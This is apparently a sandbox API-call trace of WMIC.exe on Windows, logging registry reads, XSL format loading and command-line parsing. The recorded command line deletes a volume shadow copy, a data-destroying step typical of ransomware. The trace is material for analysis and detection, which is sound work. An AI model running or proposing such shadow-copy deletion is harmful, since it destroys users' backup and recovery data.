lpReserved=0x0, lpType=0x0, lpData=0x326eb0, lpcbData=0x12eef0*=0x42 | out: lpType=0x0, lpData=0x326eb0*=0x25, lpcbData=0x12eef0*=0x42) returned 0x0 [0116.479] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0116.479] malloc (_Size=0x42) returned 0x326f40 [0116.479] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0116.479] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x12ef50, lpcbData=0x12eef0*=0x400 | out: lpType=0x0, lpData=0x12ef50*=0x36, lpcbData=0x12eef0*=0xc) returned 0x0 [0116.479] _wtol (_String="65536") returned 65536 [0116.479] free (_Block=0x326eb0) [0116.479] RegCloseKey (hKey=0x0) returned 0x6 [0116.479] CoCreateInstance (in: rclsid=0xff807410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff8073f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x12f3f8 | out: ppv=0x12f3f8*=0x20c71d0) returned 0x0 [0116.517] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x20c71d0, xmlSource=0x12f540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x326e50), isSuccessful=0x12f5b0 | out: isSuccessful=0x12f5b0*=0xffff) returned 0x0 [0116.919] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x20c71d0, DOMElement=0x12f3f0 | out: DOMElement=0x12f3f0) returned 0x0 [0116.919] malloc (_Size=0x18) returned 0x326e50 [0116.919] free (_Block=0x326e50) [0116.919] malloc (_Size=0x18) returned 0x326e50 [0116.920] free (_Block=0x326e50) [0116.920] malloc (_Size=0x18) returned 0x326e50 [0116.920] malloc (_Size=0x18) returned 0x326e70 [0116.920] malloc (_Size=0x30) returned 0x328080 [0116.920] malloc (_Size=0x18) returned 0x326eb0 [0116.921] free (_Block=0x326eb0) [0116.921] malloc (_Size=0x18) returned 0x32c560 [0116.921] malloc (_Size=0x18) returned 0x32c580 [0116.921] SysStringLen (param_1="VALUE") returned 0x5 [0116.921] SysStringLen (param_1="TABLE") returned 0x5 [0116.921] SysStringLen (param_1="TABLE") returned 0x5 [0116.921] SysStringLen (param_1="VALUE") returned 0x5 [0116.921] malloc (_Size=0x30) returned 0x3280c0 [0116.921] malloc (_Size=0x18) returned 0x32c5a0 [0116.921] free (_Block=0x32c5a0) [0116.922] malloc (_Size=0x18) returned 0x32c5a0 [0116.922] malloc (_Size=0x18) returned 0x32c5c0 [0116.922] SysStringLen (param_1="LIST") returned 0x4 [0116.922] SysStringLen (param_1="TABLE") returned 0x5 [0116.922] malloc (_Size=0x30) returned 0x328100 [0116.922] malloc (_Size=0x18) returned 0x32c5e0 [0116.922] free (_Block=0x32c5e0) [0116.922] malloc (_Size=0x18) returned 0x32c5e0 [0116.923] malloc (_Size=0x18) returned 0x32c600 [0116.923] SysStringLen (param_1="RAWXML") returned 0x6 [0116.923] SysStringLen (param_1="TABLE") returned 0x5 [0116.923] SysStringLen (param_1="RAWXML") returned 0x6 [0116.923] SysStringLen (param_1="LIST") returned 0x4 [0116.923] SysStringLen (param_1="LIST") returned 0x4 [0116.923] SysStringLen (param_1="RAWXML") returned 0x6 [0116.923] malloc (_Size=0x30) returned 0x328140 [0116.923] malloc (_Size=0x18) returned 0x32c620 [0116.923] free (_Block=0x32c620) [0116.924] malloc (_Size=0x18) returned 0x32c620 [0116.924] malloc (_Size=0x18) returned 0x32c640 [0116.924] SysStringLen (param_1="HTABLE") returned 0x6 [0116.924] SysStringLen (param_1="TABLE") returned 0x5 [0116.924] SysStringLen (param_1="HTABLE") returned 0x6 [0116.924] SysStringLen (param_1="LIST") returned 0x4 [0116.924] malloc (_Size=0x30) returned 0x328180 [0116.924] malloc (_Size=0x18) returned 0x32c660 [0116.924] free (_Block=0x32c660) [0116.925] malloc (_Size=0x18) returned 0x32c660 [0116.925] malloc (_Size=0x18) returned 0x32c680 [0116.925] SysStringLen (param_1="HFORM") returned 0x5 [0116.925] SysStringLen (param_1="TABLE") returned 0x5 [0116.925] SysStringLen (param_1="HFORM") returned 0x5 [0116.925] SysStringLen (param_1="LIST") returned 0x4 [0116.925] SysStringLen (param_1="HFORM") returned 0x5 [0116.925] SysStringLen (param_1="HTABLE") returned 0x6 [0116.925] malloc (_Size=0x30) returned 0x3281c0 [0116.925] malloc (_Size=0x18) returned 0x32c6a0 [0116.925] free (_Block=0x32c6a0) [0116.926] malloc (_Size=0x18) returned 0x32c6a0 [0116.926] malloc (_Size=0x18) returned 0x32c6c0 [0116.926] SysStringLen (param_1="XML") returned 0x3 [0116.926] SysStringLen (param_1="TABLE") returned 0x5 [0116.926] SysStringLen (param_1="XML") returned 0x3 [0116.926] SysStringLen (param_1="VALUE") returned 0x5 [0116.926] SysStringLen (param_1="VALUE") returned 0x5 [0116.926] SysStringLen (param_1="XML") returned 0x3 [0116.926] malloc (_Size=0x30) returned 0x328200 [0116.926] malloc (_Size=0x18) returned 0x32c6e0 [0116.926] free (_Block=0x32c6e0) [0116.926] malloc (_Size=0x18) returned 0x32c6e0 [0116.927] malloc (_Size=0x18) returned 0x32c700 [0116.927] SysStringLen (param_1="MOF") returned 0x3 [0116.927] SysStringLen (param_1="TABLE") returned 0x5 [0116.927] SysStringLen (param_1="MOF") returned 0x3 [0116.927] SysStringLen (param_1="LIST") returned 0x4 [0116.927] SysStringLen (param_1="MOF") returned 0x3 [0116.927] SysStringLen (param_1="RAWXML") returned 0x6 [0116.927] SysStringLen (param_1="LIST") returned 0x4 [0116.927] SysStringLen (param_1="MOF") returned 0x3 [0116.927] malloc (_Size=0x30) returned 0x328240 [0116.927] malloc (_Size=0x18) returned 0x32c720 [0116.927] free (_Block=0x32c720) [0116.927] malloc (_Size=0x18) returned 0x32c720 [0116.927] malloc (_Size=0x18) returned 0x32c740 [0116.928] SysStringLen (param_1="CSV") returned 0x3 [0116.928] SysStringLen (param_1="TABLE") returned 0x5 [0116.928] SysStringLen (param_1="CSV") returned 0x3 [0116.928] SysStringLen (param_1="LIST") returned 0x4 [0116.928] SysStringLen (param_1="CSV") returned 0x3 [0116.928] SysStringLen (param_1="HTABLE") returned 0x6 [0116.928] SysStringLen (param_1="CSV") returned 0x3 [0116.928] SysStringLen (param_1="HFORM") returned 0x5 [0116.928] malloc (_Size=0x30) returned 0x328280 [0116.928] malloc (_Size=0x18) returned 0x32c760 [0116.928] free (_Block=0x32c760) [0116.928] malloc (_Size=0x18) returned 0x32c760 [0116.928] malloc (_Size=0x18) returned 0x32c780 [0116.928] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.928] SysStringLen (param_1="TABLE") returned 0x5 [0116.928] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.929] SysStringLen (param_1="VALUE") returned 0x5 [0116.929] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.929] SysStringLen (param_1="XML") returned 0x3 [0116.929] SysStringLen (param_1="XML") returned 0x3 [0116.929] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.929] malloc (_Size=0x30) returned 0x3282c0 [0116.929] malloc (_Size=0x18) returned 0x32c7a0 [0116.929] free (_Block=0x32c7a0) [0116.929] malloc (_Size=0x18) returned 0x32c7a0 [0116.929] malloc (_Size=0x18) returned 0x32c7c0 [0116.929] SysStringLen (param_1="texttablewsys") returned 0xd [0116.929] SysStringLen (param_1="TABLE") returned 0x5 [0116.929] SysStringLen (param_1="texttablewsys") returned 0xd [0116.929] SysStringLen (param_1="XML") returned 0x3 [0116.929] SysStringLen (param_1="texttablewsys") returned 0xd [0116.929] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.929] SysStringLen (param_1="XML") returned 0x3 [0116.929] SysStringLen (param_1="texttablewsys") returned 0xd [0116.930] malloc (_Size=0x30) returned 0x328300 [0116.930] malloc (_Size=0x18) returned 0x32c7e0 [0116.930] free (_Block=0x32c7e0) [0116.930] malloc (_Size=0x18) returned 0x32c7e0 [0116.930] malloc (_Size=0x18) returned 0x32c800 [0116.930] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.930] SysStringLen (param_1="TABLE") returned 0x5 [0116.930] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.930] SysStringLen (param_1="XML") returned 0x3 [0116.930] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.930] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.930] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.930] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.930] malloc (_Size=0x30) returned 0x328340 [0116.931] malloc (_Size=0x18) returned 0x32c820 [0116.931] free (_Block=0x32c820) [0116.931] malloc (_Size=0x18) returned 0x32c820 [0116.931] malloc (_Size=0x18) returned 0x32c840 [0116.931] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.931] SysStringLen (param_1="TABLE") returned 0x5 [0116.931] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.931] SysStringLen (param_1="XML") returned 0x3 [0116.931] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.931] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.931] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.931] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.931] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.931] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.931] malloc (_Size=0x30) returned 0x328380 [0116.932] malloc (_Size=0x18) returned 0x32c860 [0116.932] free (_Block=0x32c860) [0116.932] malloc (_Size=0x18) returned 0x32c860 [0116.932] malloc (_Size=0x18) returned 0x32c880 [0116.932] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.932] SysStringLen (param_1="TABLE") returned 0x5 [0116.932] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.932] SysStringLen (param_1="XML") returned 0x3 [0116.932] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.932] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.932] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.932] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.932] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.932] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.932] malloc (_Size=0x30) returned 0x3283c0 [0116.932] malloc (_Size=0x18) returned 0x32c8a0 [0116.933] free (_Block=0x32c8a0) [0116.933] malloc (_Size=0x18) returned 0x32c8a0 [0116.933] malloc (_Size=0x18) returned 0x32c8c0 [0116.933] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.933] SysStringLen (param_1="TABLE") returned 0x5 [0116.933] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.933] SysStringLen (param_1="XML") returned 0x3 [0116.933] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.933] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.933] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.933] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.933] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.933] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.933] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.933] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0116.933] malloc (_Size=0x30) returned 0x328400 [0116.933] malloc (_Size=0x18) returned 0x32c8e0 [0116.934] free (_Block=0x32c8e0) [0116.934] malloc (_Size=0x18) returned 0x32c8e0 [0116.934] malloc (_Size=0x18) returned 0x32c900 [0116.934] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.934] SysStringLen (param_1="TABLE") returned 0x5 [0116.934] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.934] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.934] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.934] SysStringLen (param_1="XML") returned 0x3 [0116.934] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.934] SysStringLen (param_1="texttablewsys") returned 0xd [0116.934] SysStringLen (param_1="XML") returned 0x3 [0116.934] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.934] malloc (_Size=0x30) returned 0x328440 [0116.935] malloc (_Size=0x18) returned 0x32c920 [0116.935] free (_Block=0x32c920) [0116.935] malloc (_Size=0x18) returned 0x32c920 [0116.935] malloc (_Size=0x18) returned 0x32c940 [0116.935] SysStringLen (param_1="htable-sortby") returned 0xd [0116.935] SysStringLen (param_1="TABLE") returned 0x5 [0116.935] SysStringLen (param_1="htable-sortby") returned 0xd [0116.935] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.935] SysStringLen (param_1="htable-sortby") returned 0xd [0116.935] SysStringLen (param_1="XML") returned 0x3 [0116.935] SysStringLen (param_1="htable-sortby") returned 0xd [0116.935] SysStringLen (param_1="texttablewsys") returned 0xd [0116.935] SysStringLen (param_1="htable-sortby") returned 0xd [0116.935] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0116.936] SysStringLen (param_1="XML") returned 0x3 [0116.936] SysStringLen (param_1="htable-sortby") returned 0xd [0116.936] malloc (_Size=0x30) returned 0x328480 [0116.936] malloc (_Size=0x18) returned 0x32c960 [0116.936] free (_Block=0x32c960) [0116.936] malloc (_Size=0x18) returned 0x32c960 [0116.936] malloc (_Size=0x18) returned 0x32c980 [0116.936] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.936] SysStringLen (param_1="TABLE") returned 0x5 [0116.936] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.936] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.936] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.936] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.936] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.936] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.936] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.937] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.937] malloc (_Size=0x30) returned 0x3284c0 [0116.937] malloc (_Size=0x18) returned 0x32c9a0 [0116.937] free (_Block=0x32c9a0) [0116.937] malloc (_Size=0x18) returned 0x32c9a0 [0116.937] malloc (_Size=0x18) returned 0x32c9c0 [0116.937] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.937] SysStringLen (param_1="TABLE") returned 0x5 [0116.937] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.937] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.937] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.937] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.937] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.937] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0116.937] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.937] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0116.937] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.938] SysStringLen (param_1="wmiclimofformat") returned 0xf [0116.938] malloc (_Size=0x30) returned 0x328500 [0116.938] malloc (_Size=0x18) returned 0x32c9e0 [0116.938] free (_Block=0x32c9e0) [0116.938] malloc (_Size=0x18) returned 0x32c9e0 [0116.938] malloc (_Size=0x18) returned 0x32ca00 [0116.938] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.938] SysStringLen (param_1="TABLE") returned 0x5 [0116.938] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.938] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.938] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.938] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.938] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.938] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.938] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.939] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.939] malloc (_Size=0x30) returned 0x328540 [0116.939] malloc (_Size=0x18) returned 0x32ca20 [0116.939] free (_Block=0x32ca20) [0116.939] malloc (_Size=0x18) returned 0x32ca20 [0116.939] malloc (_Size=0x18) returned 0x32ca40 [0116.939] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.939] SysStringLen (param_1="TABLE") returned 0x5 [0116.939] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.939] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0116.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.940] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0116.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.940] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.940] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0116.940] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0116.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0116.940] malloc (_Size=0x30) returned 0x328580 [0116.940] FreeThreadedDOMDocument:IUnknown:Release (This=0x20c71d0) returned 0x0 [0116.940] free (_Block=0x326e90) [0116.940] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete" [0116.940] malloc (_Size=0xe0) returned 0x32cd30 [0116.940] memcpy_s (in: _Destination=0x32cd30, _DestinationSize=0xde, _Source=0x1525be, _SourceSize=0xd0 | out: _Destination=0x32cd30) returned 0x0 [0116.941] malloc (_Size=0x18) returned 0x32ca60 [0116.941] malloc (_Size=0x18) returned 0x32ca80 [0116.941] malloc (_Size=0x18) returned 0x32caa0 [0116.941] malloc (_Size=0x18) returned 0x32cac0 [0116.941] malloc (_Size=0x80) returned 0x326e90 [0116.941] GetLocalTime (in: lpSystemTime=0x12f590 | out: lpSystemTime=0x12f590*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x15, wMilliseconds=0x137)) [0116.941] _vsnwprintf (in: _Buffer=0x326e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x12f4e8 | out: _Buffer="09-04-2020T08:55:21") returned 19 [0116.941] lstrlenW (lpString=" shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned 71 [0116.941] malloc (_Size=0x90) returned 0x3270a0 [0116.941] lstrlenW (lpString=" shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned 71 [0116.941] lstrlenW (lpString=" shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned 71 [0116.941] malloc (_Size=0x90) returned 0x32ce20 [0116.941] lstrlenW (lpString=" shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned 71 [0116.941] lstrlenW (lpString=" shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned 71 [0116.941] lstrlenW (lpString=" shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned 71 [0116.941] malloc (_Size=0x16) returned 0x32cae0 [0116.941] lstrlenW (lpString="shadowcopy") returned 10 [0116.941] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0116.941] malloc (_Size=0x16) returned 0x32cb00 [0116.941] malloc (_Size=0x8) returned 0x327140 [0116.941] free (_Block=0x0) [0116.941] free (_Block=0x32cae0) [0116.942] lstrlenW (lpString=" shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned 71 [0116.942] malloc (_Size=0xc) returned 0x32cae0 [0116.942] lstrlenW (lpString="where") returned 5 [0116.942] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0116.942] malloc (_Size=0xc) returned 0x32cb20 [0116.942] malloc (_Size=0x10) returned 0x32cb40 [0116.942] memmove_s (in: _Destination=0x32cb40, _DestinationSize=0x8, _Source=0x327140, _SourceSize=0x8 | out: _Destination=0x32cb40) returned 0x0 [0116.942] free (_Block=0x327140) [0116.942] free (_Block=0x0) [0116.942] free (_Block=0x32cae0) [0116.942] lstrlenW (lpString=" shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned 71 [0116.942] malloc (_Size=0x5c) returned 0x32cec0 [0116.942] lstrlenW (lpString="\"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\"") returned 45 [0116.942] _wcsicmp (_String1="\"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\"", _String2="\"NULL\"") returned -5 [0116.942] lstrlenW (lpString="\"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\"") returned 45 [0116.942] lstrlenW (lpString="\"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\"") returned 45 [0116.942] malloc (_Size=0x5c) returned 0x32cf30 [0116.942] malloc (_Size=0x18) returned 0x32cae0 [0116.942] memmove_s (in: _Destination=0x32cae0, _DestinationSize=0x10, _Source=0x32cb40, _SourceSize=0x10 | out: _Destination=0x32cae0) returned 0x0 [0116.942] free (_Block=0x32cb40) [0116.942] free (_Block=0x0) [0116.942] free (_Block=0x32cec0) [0116.942] lstrlenW (lpString=" shadowcopy where \"ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'\" delete") returned 71 [0116.942] malloc (_Size=0xe) returned 0x32cb40 [0116.942] lstrlenW (lpString="delete") returned 6 [0116.942] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0116.943] malloc (_Size=0xe) returned 0x32cb60 [0116.943] malloc (_Size=0x20) returned 0x32cec0 [0116.943] memmove_s (in: _Destination=0x32cec0, _DestinationSize=0x18, _Source=0x32cae0, _SourceSize=0x18 | out: _Destination=0x32cec0) returned 0x0 [0116.943] free (_Block=0x32cae0) [0116.943] free (_Block=0x0) [0116.943] free (_Block=0x32cb40) [0116.943] malloc (_Size=0x20) returned 0x32cef0 [0116.943] lstrlenW (lpString="QUIT") returned 4 [0116.943] lstrlenW (lpString="shadowcopy") returned 10 [0116.943] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0116.943] lstrlenW (lpString="EXIT") returned 4 [0116.943] lstrlenW (lpString="shadowcopy") returned 10 [0116.943] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0116.943] free (_Block=0x32cef0) [0116.943] WbemLocator:IUnknown:AddRef (This=0x1c11390) returned 0x2 [0116.943] malloc (_Size=0x20) returned 0x32cef0 [0116.943] lstrlenW (lpString="/") returned 1 [0116.943] lstrlenW (lpString="shadowcopy") returned 10 [0116.943] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0116.943] lstrlenW (lpString="-") returned 1 [0116.943] lstrlenW (lpString="shadowcopy") returned 10 [0116.943] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0116.944] lstrlenW (lpString="CLASS") returned 5 [0116.944] lstrlenW (lpString="shadowcopy") returned 10 [0116.944] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0116.944] lstrlenW (lpString="PATH") returned 4 [0116.944] lstrlenW (lpString="shadowcopy") returned 10 [0116.944] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0116.944] lstrlenW (lpString="CONTEXT") returned 7 [0116.944] lstrlenW (lpString="shadowcopy") returned 10 [0116.944] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0116.944] lstrlenW (lpString="shadowcopy") returned 10 [0116.944] malloc (_Size=0x16) returned 0x32cb40 [0116.944] lstrlenW (lpString="shadowcopy") returned 10 [0116.944] GetCurrentThreadId () returned 0x488 [0116.944] ??0CHString@@QEAA@XZ () returned 0x12f3a0 [0116.944] malloc (_Size=0x18) returned 0x32cae0 [0116.944] malloc (_Size=0x18) returned 0x32cb80 [0116.944] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c11390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff872998 | out: ppNamespace=0xff872998*=0x1c23a98) returned 0x0 [0117.074] free (_Block=0x32cb80) [0117.074] free (_Block=0x32cae0) [0117.074] CoSetProxyBlanket (pProxy=0x1c23a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0117.074] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0117.074] GetCurrentThreadId () returned 0x488 [0117.074] ??0CHString@@QEAA@XZ () returned 0x12f238 [0117.074] malloc (_Size=0x18) returned 0x32cae0 [0117.074] malloc (_Size=0x18) returned 0x32cb80 [0117.074] malloc (_Size=0x18) returned 0x32cba0 [0117.074] malloc (_Size=0x18) returned 0x32cbc0 [0117.075] SysStringLen (param_1="root\\cli") returned 0x8 [0117.075] SysStringLen (param_1="\\") returned 0x1 [0117.075] malloc (_Size=0x18) returned 0x32cbe0 [0117.075] SysStringLen (param_1="root\\cli\\") returned 0x9 [0117.075] SysStringLen (param_1="ms_409") returned 0x6 [0117.075] free (_Block=0x32cbc0) [0117.075] free (_Block=0x32cba0) [0117.075] free (_Block=0x32cb80) [0117.075] free (_Block=0x32cae0) [0117.075] malloc (_Size=0x18) returned 0x32cae0 [0117.075] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c11390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff8729a0 | out: ppNamespace=0xff8729a0*=0x1c23b28) returned 0x0 [0117.103] free (_Block=0x32cae0) [0117.103] free (_Block=0x32cbe0) [0117.103] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0117.103] GetCurrentThreadId () returned 0x488 [0117.103] ??0CHString@@QEAA@XZ () returned 0x12f3b0 [0117.104] malloc (_Size=0x18) returned 0x32cbe0 [0117.104] malloc (_Size=0x18) returned 0x32cae0 [0117.104] malloc (_Size=0x18) returned 0x32cb80 [0117.104] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0117.104] malloc (_Size=0x3a) returned 0x32cfa0 [0117.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff801980, cbMultiByte=-1, lpWideCharStr=0x32cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0117.104] free (_Block=0x32cfa0) [0117.104] malloc (_Size=0x18) returned 0x32cba0 [0117.104] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0117.104] SysStringLen (param_1="shadowcopy") returned 0xa [0117.104] malloc (_Size=0x18) returned 0x32cbc0 [0117.104] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0117.104] SysStringLen (param_1="'") returned 0x1 [0117.104] free (_Block=0x32cba0) [0117.104] free (_Block=0x32cb80) [0117.104] free (_Block=0x32cae0) [0117.104] free (_Block=0x32cbe0) [0117.105] IWbemServices:GetObject (in: This=0x1c23a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x12f3b8*=0x0, ppCallResult=0x0 | out: ppObject=0x12f3b8*=0x1c304e0, ppCallResult=0x0) returned 0x0 [0117.111] malloc (_Size=0x18) returned 0x32cbe0 [0117.111] IWbemClassObject:Get (in: This=0x1c304e0, wszName="Target", lFlags=0, pVal=0x12f2e0*(varType=0x0, wReserved1=0xff87, wReserved2=0x0, wReserved3=0x0, varVal1=0xff872998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f2e0*(varType=0x8, wReserved1=0xff87, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) 